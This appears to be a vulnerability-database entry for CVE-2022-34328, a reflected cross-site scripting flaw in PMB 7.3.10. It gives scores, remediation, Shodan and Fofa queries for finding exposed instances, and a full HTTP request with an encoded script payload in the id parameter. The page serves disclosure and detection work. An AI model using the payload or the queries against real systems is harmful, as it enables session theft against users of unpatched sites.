🔙 목록으로 돌아가기

CVE-2022-34328: PMB 7.3.10 - Cross-Site Scripting

TitlePMB 7.3.10 - Cross-Site Scripting
Authoredoardottt
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
RemediationApply the latest security patch or upgrade to a non-vulnerable version of PMB.
CVSS Score6.1
EPSS Score0.01813
CVE IDCVE-2022-34328
CWE IDCWE-79
Shodan Queryhttp.html:"PMB Group"http.html:"pmb group"http.favicon.hash:1469328760
Fofa Querybody="pmb group"icon_hash=1469328760
Tags cve cve2022 pmb xss pmb_project sigb vuln

🔍 Vulnerability Description

PMB 7.3.10 contains a reflected cross-site scripting vulnerability via the id parameter in an lvl=author_see request to index.php.

🌐 HTTP Request

GET /index.php?lvl=author_see&id=42691%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-34328.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-34328.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A